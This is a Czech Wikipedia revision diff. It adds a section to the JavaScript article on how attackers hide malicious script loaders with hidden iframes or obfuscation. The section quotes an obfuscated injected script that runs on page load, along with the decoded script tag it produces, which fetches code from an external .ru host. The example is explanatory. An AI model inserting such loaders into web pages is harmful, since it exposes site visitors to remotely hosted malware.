Verze z 30. 7. 2014, 00:38 editovat Podvečerníček (diskuse \| příspěvky) Prověření uživatelé 2 376 editací →‎Dědičnost (Inheritance) ← Přejít na předchozí porovnání		Verze z 26. 8. 2014, 12:59 editovat zrušit editaci 147.32.164.159 (diskuse) Zneužívání JavaScriptu Přejít na další porovnání →
Řádek 169: V rámci tzv. [[webová přístupnost\|webové přístupnosti]] by se při vývoji webu mělo vždy dbát na správné zobrazení stránky bez ohledu na podporu skriptování na straně klienta. == Zneužívání JavaScriptu == Protože je JavaScript součástí většiny prohlížečů, existuje snaha o jeho zneužití. Aby byl škodlivý kód nesnadno zjistitelný, kromě jeho umísťování na jiné servery bývá HTML kód, který zajistí jeho načtení, maskován různými technikami. Možnými technikami je ukrytí HTML kódu zpřístupňující škodlivý JavaScript do skrytého elementu [[IFRAME]] nebo použití nečitelného kódu v samotném JavaScriptu, který HTML kód zpřístupňující škodlivý kód vygeneruje po načtení stránky.<ref name="From Hidden Iframes to Obfuscated Scripts">{{Citace elektronického periodika \| příjmení = \| jméno = \| autor = \| odkaz na autora = \| spoluautoři = \| titul = From Hidden Iframes to Obfuscated Scripts \| periodikum = Unmask Parasites \| odkaz na periodikum = \| datum vydání = 23 Dec 09 \| datum aktualizace = \| datum přístupu = \| ročník = \| číslo = \| strany = \| url = http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/ \| issn = }}</ref> Co se týká druhé možnosti, např. kód: <source lang="JavaScript"> <script> /CODE1/ try{window.onload = function() { var Q236s4ic4454clw = document.createElement('script'); Q236s4ic4454clw.setAttribute('type', 'text/javascript'); Q236s4ic4454clw.setAttribute('id', 'myscript1'); Q236s4ic4454clw.setAttribute('src', 'h(t)!^t^))p#@:&&/(##/&$#c^$$l^@)(i&(c$^)k))#$s^o$#r!^)^-$$$&c@$o#^m$!#.#&(e((a!!s)(@t)&m((o@^^n!$!e&^&(y$#).#&c$@o$@!$^m(##(.@m@o@(b(^i&#l#!@e@)@&(-(d)&(e^&@(.))@&h)@@@o^^@m!e#&&)s)a#$$l$$#e^@!p^@l&@u#((^s^#@(.$)r$$u(:!$8!$0&$&8)@$0$!)/!o#&@c##@@n(@^!.))n@e@.)&j!@^#$p#/)^@o^c^n)((.()n^)e^$.@!)$j!!^(p#!/@&)c^(l&(a&s(^s@!m^@a($^t#e!#^@)s$.^c^&#o((&m&/)(&@l&()i(@n)(k$@h&e)@$(l)$p^!e)$!$r$#.)&c!&n($@/$g#o^@&o!$$g$^l^&#@e$.&&!c#o@$$m(/$$'.*)); // místo "*" má být "replace(/\(\|\!\|&\|#\|\$\|\)\|@\|\^/ig, ''" - toto řešení je nutné z důvodu neblokování načítání této stránky antivirovými programy Q236s4ic4454clw.setAttribute('defer', 'defer'); document.body.appendChild(Q236s4ic4454clw); } catch(e) {} </script> </source> vygeneruje HTML kód: <source lang="html4strict"> <script defer="defer" src="http://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/" id="myscript1" type="text/javascript"></script> </source> který vlastní škodlivý kód načte z vnější adresy mimo napadený server.<ref name="From Hidden Iframes to Obfuscated Scripts" /> == Reference ==

JavaScript: Porovnání verzí